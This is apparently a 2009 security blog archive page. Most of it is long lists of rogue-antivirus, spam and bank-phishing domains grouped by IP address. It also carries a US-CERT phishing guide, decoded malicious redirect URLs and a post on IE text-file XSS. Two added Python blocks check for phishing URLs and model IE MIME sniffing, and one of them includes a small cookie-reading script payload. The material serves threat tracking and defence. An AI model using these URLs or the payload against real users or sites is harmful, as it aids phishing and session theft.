Domains sharing same IP address: 216.150.79.76

cacorq.info
clxhbz.info
dgrxqh.info
diwiowano.info
dmdurz.info
ftp.centod.com
funkol.info
geetol.info
gitoer.info
gutrandin.info
hizfek.info
hopore.info
ivgzda.info
jopqae.info
kolpao.info
nadotraza.info
ns.centod.com
ns2.centod.com
ofahitino.info
oirjsa.info
ornotivec.info
pirtaf.info
pop.centod.com
popsto.info
qxfcuc.info
rellok.info
ruhcsy.info
sacmtf.info
sdoras.info
tapiroten.info
tiizwb.info
traxemere.info
tuerog.info
ulmqmq.info
vivibt.info
www.cacorq.info
www.centod.com
www.clxhbz.info
www.dmdurz.info
www.geetol.info
www.gitoer.info
www.hizfek.info
www.hopore.info
www.jimlkn.info
www.jopqae.info
www.kolpao.info
www.niraynome.info
www.oirjsa.info
www.pirtaf.info
www.popsto.info
www.qxfcuc.info
www.rellok.info
www.ruhcsy.info
www.sdoras.info
www.tapiroten.info
www.tiizwb.info
www.tuerog.info
www.vivibt.info
www.yyoqny.info
xsxydj.info
yuncdjbiw.info
yyoqny.info

Sigh... it really makes me tired to analyse these malicious links. The effort becomes harder and harder as the evasion techniques improve a lot. While anti-virus has cloud security computing, the hackers/bad guys have cloud anti-security computing.

--X0end

Remove Spyware Protect From Your PC -- Rogue Antivirus

Remove.Total.Security.com


IP Address: 208.73.210.27

spywareprotect2009.com
3798283.com
aafsco.com
absoluteinc.com
alahdadibrick.com
alexstram.com
auditrack.com
azais.net
bait-zion.com
bankvisalia.com
billmonroefoundation.com
bodyextreme.com
bookmarkthispage.com
bostonbiomedica.com
brandspecialists.com
breakthebank.ca
brook.absoluteinc.com
celebris.net
cell2pc.com
cityassistedliving.com
clef.ca
connercreekacademy.com
cport.com
customag.com
davidboyce.com
dsredirection.com
e-emco.com
e-tradinghouse.com
espotting.info
evilkey.com
exchange.makery.com
exinder.com
exoticfrogs.com
fazetron.com
ftp.messageserver.com
g-spotting.com
gabber.us
geilestars.com
goodwebsearch.net
gulamcn.com
handlanu.net
harwoodgolf.com
hotdogsrfun.com
inetbusiness.com
inetonline.net
intellogix.net
khorasanibrick.com
live11.com
mail.bodyextreme.com
mail.brandspecialists.com
mail.geilestars.com
mail.gulamcn.com
mail.hotdogsrfun.com
mail.inetonline.net
mail.majorconnection.com
mail.messageserver.com
mail.suesse-maedchen.com
mailhost.brook.absoluteinc.com
majorconnection.com
makery.com
marwan.ca
mcaretail.com
menas.net
messageserver.com
mlbk.com
mmmtech.com
momyu.net
mypeoplecanada.com
nepalink.net
netwebpage.com
nonstopsolution.net
ns.gulamcn.com
ns1.alahdadibrick.com
ns1.bhwy.net
ns1.exinder.com
ns1.khorasanibrick.com
ns2.exinder.com
nyslivingmuseum.org
pajhwak.com
pal9.com
pearlcorporation.com
phukettravelshop.com
pojiejidi.com
precision-resources.com
puredirectory.com
python-hpio.net
racezoneonline.com
ragshop.com
rambos.net
rockparty.com
room41.com
russiancoins.net
salemobiles.com
samlink.com
sleftrade.com
startools.com
suesse-maedchen.com
swedenactiveholidays.com
syndic-faillite-dette.com
tfainc.com
toshibamyconnect.com
vidorpirates.com
wc3modforge.com
wembleyco.com
westernmedia.com
www.agalleria.com
www.auditrack.com
www.bostonbiomedica.com
www.breakthebank.ca
www.chs.md
www.clef.ca
www.e-emco.com
www.e-tradinghouse.com
www.handlanu.net
www.hotdogsrfun.com
www.mlbk.com
www.nyslivingmuseum.org
www.rockparty.com
www.syndic-faillite-dette.com
www.westernmedia.com
wzbt.org
zoneaffiliates.com


IP Address: 174.132.250.194

antivirus360remover.com
av360removaltool.com
mail.malwarebot.org
mail.malwaree.com
mail.malwaree.org
mail.remove-a360.com
mail.remove-antivirus-360.com
mail.remove-antivirus-system-pro.com
mail.remove-antivirusbest.com
mail.remove-av360.com
mail.remove-ie-security.com
mail.remove-malware-defender.com
mail.remove-malware-doctor.com
mail.remove-ms-antispyware.com
mail.remove-personal-antivirus.com
mail.remove-personal-defender.com
mail.remove-spyware-guard.com
mail.remove-spyware-protect-2009.com
mail.remove-spyware-protect.com
mail.remove-system-guard.com
mail.remove-total-security.com
mail.remove-ultra-antivir-2009.com
mail.remove-ultra-antivirus-2009.com
mail.remove-virus-alarm.com
mail.remove-virus-melt.com
mail.remove-winpc-antivirus.com
mail.remove-winpc-defender.com
mail.vundofixtool.com
mail.www-malware.org
malwarebot.org
malwaree.com
malwaree.org
remove-a360.com
remove-antivirus-360.com
remove-antivirus-system-pro.com
remove-antivirusbest.com
remove-av360.com
remove-ie-security.com
remove-malware-defender.com
remove-malware-doctor.com
remove-ms-antispyware.com
remove-personal-antivirus.com
remove-personal-defender.com
remove-spyware-guard.com
remove-spyware-protect-2009.com
remove-spyware-protect.com
remove-system-guard.com
remove-total-security.com
remove-ultra-antivir-2009.com
remove-ultra-antivirus-2009.com
remove-virus-alarm.com
remove-virus-melt.com
remove-winpc-antivirus.com
remove-winpc-defender.com
smitfraudfixtool.com
vundofix.org
vundofixtool.com
www-malware.org
www.av360removaltool.com
www.malwarebot.org
www.malwaree.com
www.malwaree.org
www.remove-a360.com
www.remove-antivirus-360.com
www.remove-av360.com
www.remove-ie-security.com
www.remove-ms-antispyware.com
www.remove-spyware-protect.com
www.remove-system-guard.com
www.remove-total-security.com
www.remove-ultra-antivirus-2009.com
www.remove-virus-alarm.com
www.remove-virus-melt.com
www.vundofixtool.com

Malicious ** 24-Oct, fshanghai.net

fshanghai.net (113.30.107.99)

main.php:

Decoded code:
->http://fshanghai.net/zb/main.php?s=aKbK6jssA&id=2
->http://fshanghai.net/zb/main.php?s=aKbK6jssA&id=3

baramdeco.net
biss.ssz.kr
eyesteal.net
forgogh.net
fshanghai.net
jrsansam.com
linkmoa.net
moonshinsa.com
silveryjoy.net
utaksa.org
332533.com
jeilnaksi.com
sansameo.com

Win Brand New iPhone Scam

Recently, I received an email about winning a brand new iPhone just by answering a simple question. I believe this is a scam, and people fall for this kind of spam too.





Friday, October 23, 2009

Avoiding Social Engineering and Phishing Attacks

Reference: US-CERT

Cyber Security Tip ST04-014
Avoiding Social Engineering and Phishing Attacks

Do not give sensitive information to anyone unless you are sure that they
are indeed who they claim to be and that they should have access to the
information.

What is a social engineering attack?

In a social engineering attack, an attacker uses human interaction (social
skills) to obtain or compromise information about an organization or its
computer systems. An attacker may seem unassuming and respectable, possibly
claiming to be a new employee, repair person, or researcher and even
offering credentials to support that identity. However, by asking questions,
he or she may be able to piece together enough information to infiltrate an
organization's network. If an attacker is not able to gather enough
information from one source, he or she may contact another source within the
same organization and rely on the information from the first source to add
to his or her credibility.

What is a phishing attack?

Phishing is a form of social engineering. Phishing attacks use email or
malicious websites to solicit personal information by posing as a
trustworthy organization. For example, an attacker may send email seemingly
from a reputable credit card company or financial institution that requests
account information, often suggesting that there is a problem. When users
respond with the requested information, attackers can use it to gain access
to the accounts.

Phishing attacks may also appear to come from other types of organizations,
such as charities. Attackers often take advantage of current events and
certain times of the year, such as
* natural disasters (e.g., Hurricane Katrina, Indonesian tsunami)
* epidemics and health scares (e.g., H1N1)
* economic concerns (e.g., IRS scams)
* major political elections
* holidays

How do you avoid being a victim?

* Be suspicious of unsolicited phone calls, visits, or email messages from
individuals asking about employees or other internal information. If an
unknown individual claims to be from a legitimate organization, try to
verify his or her identity directly with the company.
* Do not provide personal information or information about your
organization, including its structure or networks, unless you are
certain of a person's authority to have the information.
* Do not reveal personal or financial information in email, and do not
respond to email solicitations for this information. This includes
following links sent in email.
* Don't send sensitive information over the Internet before checking a
website's security (see Protecting Your Privacy for more information).
* Pay attention to the URL of a website. Malicious websites may look
identical to a legitimate site, but the URL may use a variation in
spelling or a different domain (e.g., .com vs. .net).
* If you are unsure whether an email request is legitimate, try to verify
it by contacting the company directly. Do not use contact information
provided on a website connected to the request; instead, check previous
statements for contact information. Information about known phishing
attacks is also available online from groups such as the Anti-Phishing
Working Group (http://www.antiphishing.org).
* Install and maintain anti-virus software, firewalls, and email filters
to reduce some of this traffic (see Understanding Firewalls,
Understanding Anti-Virus Software, and Reducing Spam for more
information).
* Take advantage of any anti-phishing features offered by your email
client and web browser.

What do you do if you think you are a victim?

* If you believe you might have revealed sensitive information about your
organization, report it to the appropriate people within the
organization, including network administrators. They can be alert for
any suspicious or unusual activity.
* If you believe your financial accounts may be compromised, contact your
financial institution immediately and close any accounts that may have
been compromised. Watch for any unexplainable charges to your account.
* Immediately change any passwords you might have revealed. If you used
the same password for multiple resources, make sure to change it for
each account, and do not use that password in the future.
* Watch for other signs of identity theft (see Preventing and Responding
to Identity Theft for more information).
* Consider reporting the attack to the police, and file a report with the
Federal Trade Commission (http://www.ftc.gov/).

Reference: US-CERT
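The advice above about watching the URL can be turned into a check. The following is an added example (not US-CERT's or this blog's code): given a URL and a small table mapping brand keywords to the domains those brands legitimately use, it reports a brand name appearing on a foreign registrable domain (the pattern of the free-host phishing names such as wachoviaonlines.t35.com and hdfcbanks.t35.com listed later on this page), a registrable domain within two edits of a brand name (the spelling-variation case), and punycode (xn--) hostnames that can hide look-alike characters. The brand table and the stand-in for the Public Suffix List are constructed assumptions for the example.

```python
"""Heuristic checks for phishing URLs: brand on a foreign domain, typosquatting,
punycode hostnames. Added example; not code from the page's author."""
from urllib.parse import urlsplit

# Constructed for this example (not an authoritative list): brand keyword ->
# registrable domains the brand really uses.
BRANDS = {
    "wachovia": {"wachovia.com"},
    "hdfc": {"hdfcbank.com"},
    "banamex": {"banamex.com"},
    "lloyds": {"lloydstsb.com"},
    "halifax": {"halifax.co.uk"},
}

# Assumption: a tiny stand-in for the Public Suffix List. Under these suffixes
# the registrable domain needs three labels, not two.
TWO_LEVEL_SUFFIXES = {"co.uk", "com.my", "com.cn"}


def registrable_domain(host):
    """Organisation-level domain: last two labels, or three under a two-level suffix."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return labels[0]
    n = 3 if ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def levenshtein(a, b):
    """Edit distance, used to catch spelling variations of a brand name."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_url(url):
    """Return sorted findings for one URL; an empty list means nothing was flagged.

    Findings: ("punycode", host), ("brand-on-foreign-domain", brand, domain)
    or ("typosquat", brand, domain)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    domain = registrable_domain(host)
    domain_label = domain.split(".")[0]
    haystack = host + parts.path.lower()
    findings = set()
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.add(("punycode", host))
    for brand, legit in BRANDS.items():
        if domain in legit:
            continue                      # the brand's own site
        if brand in haystack:
            findings.add(("brand-on-foreign-domain", brand, domain))
        elif 0 < levenshtein(domain_label, brand) <= 2:
            findings.add(("typosquat", brand, domain))
    return sorted(findings)


if __name__ == "__main__":
    for u in ("http://wachoviaonlines.t35.com/login", "https://www.wachovia.com/online",
              "wachovla.com/secure", "http://xn--eqr446j.cn/"):
        print(u, "->", check_url(u) or "clean")
```

The important design point is that the brand keyword is matched against the whole hostname and path, but the decision is made on the registrable domain: "wachovia" anywhere in the name is meaningless unless the part the registrar actually sold is wachovia.com. A real deployment would load the brand table and the public suffix list from maintained sources rather than the constructed tables above.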

100 Ways You Should Be Using Facebook in Your Classroom

Facebook is not just a networking tool for communicating with friends, sharing photos, playing games and so on. My reader sent me an email about 100 ways Facebook can be used for educational purposes. This is a fabulous idea, thumbs up!

Reference: OnlineCollege

Facebook isn’t just a great way for you to find old friends or learn about what’s happening this weekend, it is also an incredible learning tool. Teachers can utilize Facebook for class projects, for enhancing communication, and for engaging students in a manner that might not be entirely possible in traditional classroom settings. Read on to learn how you can be using Facebook in your classroom, no matter if you are a professor, student, working online, or showing up in person for class.



Monday, October 19, 2009

Threat: Microsoft Internet Explorer (MSIE) Cross-Site Scripting (XSS) in a Text File

A reader from China sent me an email about a cross-site scripting (XSS) payload that executes in IE; it was posted on a Chinese security blog recently.

IE8, one of Microsoft's latest browsers, claims to offer users more protection than previous versions through a combination of new security and privacy features. It can nevertheless easily become a vehicle for XSS, because most users open their text files in the browser. The underlying cause is IE's MIME sniffing: when a response labelled text/plain begins with HTML-looking markup, IE 6, 7 and 8 ignore the declared type and render the file as HTML, so any <script> inside the .txt runs in the origin of the site that served it. IE8 only stops sniffing when the server sends an X-Content-Type-Options: nosniff header; IE6 and IE7 ignore that header entirely.

The XSS payload was written in a plain text file and executed successfully in Internet Explorer 8 and IE 6. I don't have IE 7 installed, but I believe the probability is high that it works in IE 7 as well.

The text-file XSS PoC was tested and does not work in Firefox or Google Chrome.




guama.txt source code:



Given that this kind of XSS can be executed so easily from a text file (.txt format), why are so many users still taking the risk of browsing with IE?


Reference: www.smxiaoqiang.cn/guama.txt
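To make the mechanism concrete, here is an added example (not from the blog or the referenced PoC) that models the sniffing decision a browser such as IE6-8 makes for a text/plain response and shows the headers that turn it off. The tag list is an approximation of IE's documented heuristic (it scans the first 256 bytes for well-known HTML tags) and is an assumption, not Microsoft's code; the sample text file is constructed.

```python
"""Why a .txt file becomes XSS in IE: a model of text/plain sniffing, and the
headers that disable it. Added example; the tag list is an approximation."""

# Assumption: tags that trigger "this is really HTML" inside the sniffing window,
# drawn from the IE documentation and the WHATWG sniffing algorithm that mirrors
# it. Real IE builds differ in detail; treat the list as approximate.
HTML_TAGS = (b"<!doctype html", b"<html", b"<head", b"<title", b"<body",
             b"<script", b"<a href", b"<pre", b"<img", b"<plaintext",
             b"<table", b"<iframe", b"<div", b"<h1", b"<font", b"<style", b"<!--")
SNIFF_WINDOW = 256   # IE only examines the first 256 bytes


def looks_like_html(body):
    """True if the sniffing window contains one of the tags (case-insensitive)."""
    window = body[:SNIFF_WINDOW].lower()
    return any(tag in window for tag in HTML_TAGS)


def effective_type(headers, body, honours_nosniff=True):
    """Content type a sniffing browser will act on.

    honours_nosniff=True models IE8, which stops sniffing when the server sends
    X-Content-Type-Options: nosniff; IE6/7 ignore the header (pass False)."""
    h = {k.lower(): v for k, v in headers.items()}
    declared = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"
    if nosniff and honours_nosniff:
        return declared
    if declared in ("text/plain", "") and looks_like_html(body):
        return "text/html"        # rendered as HTML: <script> in the .txt runs
    return declared


def hardened_headers(content_type="text/plain; charset=utf-8", download=False):
    """Headers for serving user-supplied text. nosniff covers IE8+; forcing a
    download (Content-Disposition: attachment) also covers browsers that ignore it."""
    headers = {"Content-Type": content_type, "X-Content-Type-Options": "nosniff"}
    if download:
        headers["Content-Disposition"] = 'attachment; filename="file.txt"'
    return headers


# Constructed stand-in for a guama.txt-style file: plain text carrying a script tag.
SAMPLE_TXT = b"Just a text file.\n<script>alert(document.cookie)</script>\n"


def demo():
    """(naive server, hardened server seen by IE8, hardened server seen by IE7)."""
    naive = {"Content-Type": "text/plain"}
    return (effective_type(naive, SAMPLE_TXT),
            effective_type(hardened_headers(), SAMPLE_TXT),
            effective_type(hardened_headers(), SAMPLE_TXT, honours_nosniff=False))


if __name__ == "__main__":
    print(demo())   # ('text/html', 'text/plain', 'text/html')
```

The third value in demo() is the practical caveat: nosniff alone does nothing for IE6/7, so a site that lets users upload text it will serve back needs the download=True variant (or a separate, cookie-less domain) as well. Note also the 256-byte window: markup that starts after it is not sniffed, which is why the defence has to be the headers rather than inspecting content.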

Microsoft Outlook Web Access (OWA) SEO Poisoning

While most of the media were reporting on the Microsoft Outlook Web Access (OWA) spam campaign spreading through email, what I see is that the OWA keyword has itself become an SEO poisoning keyword: searches related to OWA end up at rogue AV.




The rogue AV has very low AV detection (VirusTotal 1/41).


Related domains and IP address:

IP Address: 91.213.126.150

coolstats1.net
goodstats1.net
sunstats1.net

IP Address: 85.12.24.11

top-antispyware-scan9.com
topantimalwarescan5.com
your-pc-protection1.com

IP Address: 91.205.40.5

marketcoms.cn

Friday, October 16, 2009

Spam **16-Oct-09

Spam Lists:-

IP Address: 159.226.7.162

*.sexiono.cn
*.sexvideo-thith.cn
*.tbonx.cn
*.w58.kj96.cn
*.xn--i8sw9d6z4a6xk.cn
*.xrmail4.cn
*.yu1u.cn
*.zhong268.cn
216.105jc001.cn
5j8dsand.cn
66sfx.cn
713sese.cn
85jaay5.cn
908jdla222.cn
abcrot.cn
abus3r.cn
adminfile.cn
aiaoqhfo.cn
airwaystours.mx1.abcde.cm.cn
alhesbah.cn
axa1.cn
b0san.cn
baidu-baiduxin4.cn
cn.mouldbiz.cn
de89i9.cn
durakamvezet.cn
eurosmoke.cn
famplayfit.cn
fastfreetest.cn
fffffffggggg.cn
firewalled.cn
fyukj.cn
hxg011.cn
idle.a.w-a-y.cn
ing-groupinc.cn
is.fr0zen.cn
it.databsd.cn
jeflea.cn
jiqq1.8udns2.cn
jrjcjzx.cn
jyeyq.cn
jzm011.cn
kamarket.cn
leizi888.cn
lj4sll.cn
madamhcne.cn
mail.dnsrobot.cn
mail.hsyccb.cn
mail.xn--i8sw9d6z4a6xk.cn
mail.xrmail4.cn
max-16.cn
mfjdk.cn
mndfg.cn
nikits.cn
ns2.famplayfit.cn
ns2.lerte.cn
of.mon3y.cn
oitqu.cn
ok886.8udns1.cn
pc-check.cn
pcavublo.cn
psp777.cn
qxz7.cn
regentland.cn
seek-database.cn
sex-god.cn
sex.cn
simonhongyahoo.cn
sllwrnm7.cn
sllwrnm8.cn
svc.eblyx.cn
tbsince.cn
theyourbest.cn
tsblogon.cn
tybgh.cn
una.m-i-a-u.cn
uni-vod.cn
unlock69.cn
user.comgome.cn
user1.jzm007.cn
vlokj.cn
w3og.cn
web.yu1u.cn
webcomunity.cn
www.86qq8.cn
www.ovemvuea.cn
www.cc388.cn
www.co.cn
www.pikings.cn
www.ortjntea.cn
xiaba66.cn
xmjyq.cn
xn--9kq39ivpi18g4vn.cn
xn--eqr446j.cn
xn--eqrs9hqx1a.cn
xn--fctw1yg2d65kp3l.cn
xn--fiqs8seqcu10a4h7c.cn
xn--i8sw9d6z4a6xk.cn
xn--kput3ixou56i.cn
xn--omsv2bg0yq6f.cn
xn--pss89jq4pvo0ahgi.com
xn--qev38a12kcvuqtd.cn
xn--srs561hr5ckwl.cn
xn--xfrz5mzq4avbl.cn
xn--xhq82ag8sppbr5iitgdp3d.net
xn--yrvt74bqhf.cn
xn--zqs19tzw5a.cn
ylx99.cn
yu1u.cn
zdq003.cn
zh.018e.cn
zlwrnm20.cn
a86d86.kpocepeb.cn


IP Address: 60.172.210.4

www.ganuxoc.cn
www.yurihib.cn
fb3d5f.pubehof.cn
www.yubajib.cn
www.bojosid.cn
996.fabaret.cn
085.gibazov.cn
f36.neworer.cn


IP Address: 203.93.208.86

*.bvanafiz.cn
*.cvupuqal.cn
*.gkavovom.cn
*.jxaqivuy.cn
*.rpafacuj.cn
*.trazawib.cn
08075.pquqeter.cn
0c1007.twelagip.cn
4245cb.qnahatep.cn
ns1.buildpious.com
ns1.cornreal.com
ns1.coursedo.com
ns1.dependorder.com
ns1.noticestream.com
ns1.renowncook.com
ns1.sailcalm.com
ns1.sisterspend.com
ns1.sizemay.com
ns1.smilenotice.com
ns1.wifezeal.com
ns2.classmover.com
ns2.strongmouth.com
ns2321.lamedelegation.ripn.net
ns3.ba43.com
ns3.behindmile.com
ns3.bellfrom.com
ns3.centmotivation.com
ns3.cu28.com
ns3.da39.com
ns3.decidesit.com
ns3.deserttwo.com
ns3.dimplechaste.com
ns3.fabledsolar.com
ns3.figurenoon.com
ns3.flatagain.com
ns3.grayunique.com
ns3.groundbed.com
ns3.haveover.com
ns3.hitstead.com
ns3.inventcross.com
ns3.linehumor.com
ns3.med22.org
ns3.minepush.com
ns3.monthdry.com
ns3.moverhand.com
ns3.mu77.net
ns3.northmy.com
ns3.nu23.com
ns3.ourcould.com
ns3.oversmooth.com
ns3.painteager.com
ns3.regionget.com
ns3.replytwenty.com
ns3.rowbranch.com
ns3.sharefollow.com
ns3.shoecoast.com
ns3.sightunique.com
ns3.skinglad.com
ns3.skinround.com
ns3.soweight.com
ns3.speedsuperb.com
ns3.staymoral.com
ns3.streamcrowd.com
ns3.symbolride.com
ns3.theyfull.com
ns3.thoughago.com
ns3.tiedraw.com
ns3.totalchaste.com
ns3.tubeold.com
ns3.via11.net
ns3.via22.net
ns3.via99.org
ns3.wantcover.com
ns3.washequate.com
ns3.worthyfound.com
ns4.advocacycoast.com
ns4.amresolution.com
ns4.majormoral.com
ns4.stoodsail.com
ns4.valuedflower.com
ns5.0g7.ru
ns5.appeartry.com
ns5.coateach.com
ns5.fellcause.com
ns5.putflower.com
ns6.0ck.ru
ns6.6s2.ru
www.csaduxil.cn
www.caregor.cn
www.yiqaliq.cn
www.hatusam.cn
ynakefir.cn
0ck.ru
33-99.com
amresolution.com
beginsaid.com
express-meds.com
linehumor.com
oureffect.com
repeatcrease.com
smuhelef.cn
ab8.bebocaw.cn
alison.hibakiz.cn
fc01.wzeqnepp.cn
e34.giduwuq.cn
ab93.rixofar.cn


IP Address: 218.75.149.156

www.oxdodqea.cn
blushflash.com
streetbrown.com
wwwdnsforum.com
ns2.wwwdnsforum.com
www.oiogxbea.cn
www.iidmdwue.cn
www.ibpgfbue.cn


IP Address: 61.191.188.85

www.bemegic.cn
www.yximolim.cn
www.yehiwir.cn
24032.yojokow.cn
d0c22b.xidudig.cn
03e.jepawad.cn
f15.lelibav.cn
6828.ducuhum.cn
7445ac.zudavur.cn
62c.bgomilor.cn
discipline.qojapos.cn


IP Address: 114.205.10.176

dihenioe.cn
*.bvuoavts.cn
*.chancetag.com
*.coldnew.com
*.coldtrust.com
*.linkdnssetup.com
*.movebowl.com
*.oceanmath.com
*.strongbowl.com
*.trialhuge.com
blushdisc.com
blushfish.com
blushfood.com
blushsign.com
bobhot.com
bowlblush.com
bvuoavts.cn
coldnew.com
coldtrust.com
herbalpenispill.net
linkdnssetup.com
liveblush.com
movebowl.com
ns1.bvuoavts.cn
ns1.chancetag.com
ns1.coldnew.com
ns1.coldtrust.com
ns1.movebowl.com
ns1.oceanmath.com
ns1.strongbowl.com
ns1.townstrong.com
ns2.chancetag.com
ns2.coldnew.com
ns2.movebowl.com
ns2.oceanmath.com
ns2.strongbowl.com
ns2.strongsuper.com
ns2.townstrong.com
sizedr.com
trialhuge.com
www.trialhuge.com
chancetag.com
coldtrust.com
movebowl.com
oceanmath.com
strongbowl.com
strongsuper.com
townstrong.com


IP Address: 87.242.78.57

*.by.ru
*.max-foto.info
*.wwretsapio.by.ru
45-24-03.com
admlyuban.by.ru
arcland.by.ru
atb.by.ru
awn.by.ru
bancaposte.by.ru
belgorod.by.ru
beliy-medved.by.ru
bpolbancoposta.by.ru
dreemeer.by.ru
e-zbuild.com
egroo.by.ru
elik.by.ru
em83.by.ru
forsyte.by.ru
gamerland.by.ru
goz.by.ru
grayxufyfy.by.ru
gwtw.by.ru
gym.by.ru
host.by.ru
indetails.info
itsbi.org
lag12.by.ru
localexploit.by.ru
m-tv.co.cc
mail.by.ru
mapple.by.ru
mendes.by.ru
montikor.by.ru
moscargo.com
ns3.by.ru
okus.ru
ot18.info
personals.by.ru
posteitali.by.ru
primero.by.ru
rebelde-mexico.by.ru
reklamaru.by.ru
shura.by.ru
sjc.ru
snape.by.ru
t-stan.by.ru
tenek.by.ru
tligurov.by.ru
tp.by.ru
transazia.by.ru
tuganov.by.ru
tut.by.ru
ukrokplus.by.ru
unicreditbancaitalia.by.ru
uva.ru
vof.by.ru
wwretsapio.by.ru
www.max-foto.info
i-share.by.ru
mestovstrechi.by.ru


IP Address: 66.45.237.220

*.hdfccs_bank.t35.com
*.t35.com
abaddonsheaven.t35.com
abbey1.t35.com
alfredgomx.t35.com
angelsaddiavolo.t35.com
banaameex.t35.com
banamex-empresas.t35.com
banamex-personas.t35.com
banamexboveda.t35.com
bancanet-online.t35.com
bancanetonline.t35.com
barnamex.t35.com
bl-lit.t35.com
boveda-banamex.t35.com
boveda-bancanet.t35.com
bovedabanamex.t35.com
bovedabancanet-banamex.t35.com
burn-proxy.t35.com
citisecure.t35.com
citisecures.t35.com
dandatiger.t35.com
danke.t35.com
demo.t35.com
derricklewizzz.t35.com
dubaiway.t35.com
emailyahoo.t35.com
farsa.t35.com
freechips.t35.com
gallerypic.t35.com
gautamgambhir.t35.com
gotogo.t35.com
grupo-banamex.t35.com
grupofinanciero-banamex.t35.com
halifax2008.t35.com
halifaxopen.t35.com
haliffaxex.t35.com
hdfcbanks.t35.com
hdfcbannk.t35.com
hdfccs_bank.t35.com
hdfccs_banks.t35.com
hdffc_update.t35.com
hdffc_updates.t35.com
hdffccs_bank.t35.com
hdffcs_bank.t35.com
hinter.t35.com
homefacture.t35.com
icusecolo.t35.com
intercontinentalonline.t35.com
intercontinentals.t35.com
jaredamaupdate.t35.com
kalerxy.t35.com
knownman.t35.com
lafon.t35.com
lloydsupdate.t35.com
lodger.t35.com
login-verify2.t35.com
login-verify3.t35.com
login-verify4.t35.com
makanarolling.t35.com
maman123.t35.com
metalmelt.t35.com
mmundialbw.t35.com
mylloydstsbhome.t35.com
naufork.t35.com
nertyuu.t35.com
netkey-banamex.t35.com
newvisa.t35.com
newvision.t35.com
notificacion.t35.com
notificacionbanamex.t35.com
notificacionbancanet.t35.com
notificaciones.t35.com
onlienforlresak.t35.com
online-banamex.t35.com
onlinewachovia.t35.com
patricia2.t35.com
portal-banamex.t35.com
pozaa.t35.com
qwick-fix.t35.com
rbconline.t35.com
rbconlinex.t35.com
rbscolla.t35.com
redirectluss.t35.com
registros.t35.com
sahariyani1.t35.com
sbiinternationalonline.t35.com
sbionlinelive.t35.com
scotiabank-inverlat.t35.com
scotti.t35.com
sesionesbancanetbanamex.t35.com
seviciomessenger.t35.com
sururlu.t35.com
thdao.t35.com
updatemakana.t35.com
verifiedvisa.t35.com
vjio.t35.com
wach.t35.com
wachoi.t35.com
wachoivamndfjewkjak.t35.com
wachov.t35.com
wachovia_bankingsecurity.t35.com
wachoviaaccess.t35.com
wachoviabola.t35.com
wachoviabola1.t35.com
wachoviadeola.t35.com
wachoviadssa.t35.com
wachovialook.t35.com
wachoviaonlines.t35.com
wachoviasupdates.t35.com
wachoviaupdatess.t35.com
warlexy100.t35.com
wearedone.t35.com
web951.t35.com
weter.t35.com
www.falilat.t35.com
www.hdfccs_bank.t35.com
yahooboss.t35.com
yahooidfarzad.t35.com
yahoologin00.t35.com
yahooo1508.t35.com
yooohooman.t35.com
orlando.t35.com


IP Address: 212.244.48.53

republika.d.onet.pl
*.ab_ovo.republika.pl
*.cwsunitra.republika.pl
*.kozi_m.republika.pl
*.kriso.republika.pl
*.martavicari.republika.pl
*.multipro2005.republika.pl
*.naszaszansa.republika.pl
*.republika.pl
*.translatorduo.republika.pl
ab_ovo.republika.pl
acanthus.republika.pl
analizator.republika.pl
antymobbing.republika.pl
bianar.republika.pl
brebox.republika.pl
chatek.republika.pl
cwsunitra.com
cwsunitra.republika.pl
cyfbar.republika.pl
czechupwhu.republika.pl
dariuszpod.republika.pl
dawidziuk0.republika.pl
deepurple1.republika.pl
diabetic.republika.pl
domykanadyjskie.republika.pl
edward-bialek.republika.pl
epolisa.republika.pl
fhupema.republika.pl
ftp2.republika.pl
gim1leszno.republika.pl
gmph.republika.pl
goryniakp.republika.pl
granitgranit.republika.pl
grom5.republika.pl
gwiazdka.republika.pl
hamra.republika.pl
henry130.republika.pl
jablonie.republika.pl
kaliszok.republika.pl
kangootip.com
konciel.republika.pl
kozi_m.republika.pl
kriso.republika.pl
leonzs3.republika.pl
livnew.republika.pl
lizakicukierki.republika.pl
madcraft.republika.pl
mario236.republika.pl
martavicari.republika.pl
meniere.republika.pl
mfmch.republika.pl
microft.republika.pl
miniglass.republika.pl
moduss.republika.pl
msc1.republika.pl
multipro2005.republika.pl
naszaszansa.republika.pl
netpit.republika.pl
olambik.republika.pl
pilot4.republika.pl
polfito.republika.pl
polskaferma.republika.pl
ppgen.republika.pl
ptchprie.republika.pl
pwswitch.republika.pl
raddeli.republika.pl
republika.d.onet.pl
rfq.republika.pl
serwiszegluj.republika.pl
straznikbeskidu.republika.pl
superstudent.republika.pl
swiatkanarkow.republika.pl
swrazem.republika.pl
szlifierniaamber.republika.pl
szpic.republika.pl
tmsp.republika.pl
www.ab_ovo.republika.pl
www.aborcja-pl.republika.pl
www.afurman.republika.pl
www.apt.republika.pl
www.arendarski-maciej.republika.pl
www.bokamaro.republika.pl
www.capriszon.republika.pl
www.chaos.republika.pl
www.cwsunitra.republika.pl
www.energowierzba.republika.pl
www.fakesteroids.republika.pl
www.fanatic20.republika.pl
www.isobel.republika.pl
www.klimapo.republika.pl
www.klubspp.republika.pl
www.kozi_m.republika.pl
www.kriso.republika.pl
www.lgw.republika.pl
www.martavicari.republika.pl
www.mojecharty.republika.pl
www.mojpodhalan.republika.pl
www.mukolud23.republika.pl
www.multipro2005.republika.pl
www.naszaszansa.republika.pl
www.niemcza.republika.pl
www.nieradzik.republika.pl
www.omegagranitrans.republika.pl
www.orange47.republika.pl
www.pabet2005.republika.pl
www.palabra.republika.pl
www.pfroios.republika.pl
www.pinczer.republika.pl
www.r19.republika.pl
www.sigmaradomsko.republika.pl
www.smtj.republika.pl
www.sznaucer2.republika.pl
www.taga.republika.pl
www.tipo.republika.pl
www.totalwar.republika.pl
www.translatorduo.republika.pl
www.unitel.republika.pl
www.vbscript.republika.pl
www.windykuj.republika.pl
www.zrbmardula.republika.pl
wyooo.republika.pl
zielonemity.republika.pl


IP Address: 217.74.65.162

*.deltah.w.interia.pl
*.w.interia.pl
